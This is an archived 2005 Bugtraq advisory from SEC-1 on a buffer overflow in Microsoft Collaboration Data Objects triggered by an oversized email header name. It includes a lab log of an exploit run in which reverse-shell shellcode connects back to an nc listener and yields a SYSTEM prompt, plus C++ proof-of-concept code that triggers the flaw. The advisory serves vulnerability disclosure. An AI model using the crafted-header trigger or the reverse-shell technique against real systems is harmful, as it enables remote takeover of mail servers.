lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <DE5B0CD0A5DEE04F9147D08BF6DD21DF08B4B3@sec1svr03.SEC1SVR2003.sec-1.com>
Date: Wed, 12 Oct 2005 11:01:50 +0100
From: "Gary Oleary-Steele" <garyo@...-1.com>
To: <bugtraq@...urityfocus.com>, <news@...uriteam.com>
Cc: <pen-test@...urityfocus.com>, <Vuln-Dev@...urityfocus.com>,
	<Vuln@...irt.com>, <submissions@...ketstormsecurity.org>
Subject: [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability


                                SEC-1 LTD.
                              www.sec-1.com

                             Security Advisory

Advisory Name: 	Collaboration Data Objects Buffer Overflow Vulnerability
  Application: 	Multiple Applications that implement CDO
     Platform: 	Windows 2000 (All versions)
			Windows XP (All versions inc sp2)
			Windows Server 2003 (All versions)
			Exchange 2000 Server Service Post-Service pack 3

     Severity: 	Critical. Remote Code Execution 
       Author: 	Gary O'leary-Steele 
Vendor Status: 	Patch Released
CVE Candidate: 	CAN-2005-1987
    Reference:	http://www.sec-1.com
    Disclosed:	12/October/2005


Vulnerability Details: 

Sec-1 has identified an exploitable Buffer Overflow within Collaboration
Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when 
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.

The vulnerability can be exploited by crafting an e-mail with a large 
header name such as "Content-Type<LARGE STRING>:". 
A failure to correctly determine the length of the string results in a
stack overflow. Successful exploitation of the vulnerability could allow
the attacker to gain complete control of the vulnerable host. Under 
certain conditions the vulnerability can also be used to bypass content
security mechanisms such as virus and content security scanners. Proof
of
concept code to recreate the problem is included at the bottom of this 
advisory.


Exploit Availability:

Sec-1 do not release exploit code to the general public. 
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course 
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal. 
See: http://www.sec-1.com/applied_hacking_course.html


Exploit Example:

[root@...er PoC]# perl cdo.pl -f me@...t.com -t me@...t.com -h 10.0.0.53

Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80

[*]----Connected OK!
[*]----Sending MAIL FROM: me@...t.com
[*]----Sending RCPT TO: <me@...t.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.

[!]	Note this may take a while. Inetinfo will crash and restart
	This will happen until a nops are reached. You may also want 
	to clear the queue to restore Inetinfo.exe by deleting malformed

	e-mail from c:\Inetpub\mailroot\Queue

[root@...er PoC]# nc -l -p 80 -v
listening on [any] 80 ...

10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>


Vendor Response:

Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

		CAN-2005-1987


Demonstration:

The following CDO code demonstrates the problem.

Step 1.

Create an E-mail named vuln.eml including a large "Content-Type:"
header.

Step 2.

// Compile with -GX option
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

#include <stdio.h>

int main()
{

CoInitialize(0);
try
{
 CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
 _StreamPtr spStream(spMsg->GetStream());
 spStream->Position = 0;
 spStream->Type = adTypeBinary;
 spStream->LoadFromFile("vuln.eml");
 spStream->Flush();

  for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
  {
	CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
	_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
  }

}
  catch(_com_error &e)
	{
	printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
	}
	catch(...)
	{
	printf("General exception\n");
	}

	CoUninitialize();

	return 0;
}

	CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
	_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;


Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security 
to further your knowledge and protect your network 
http://www.sec-1.com/applied_hacking_course.html
**************************************************************


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ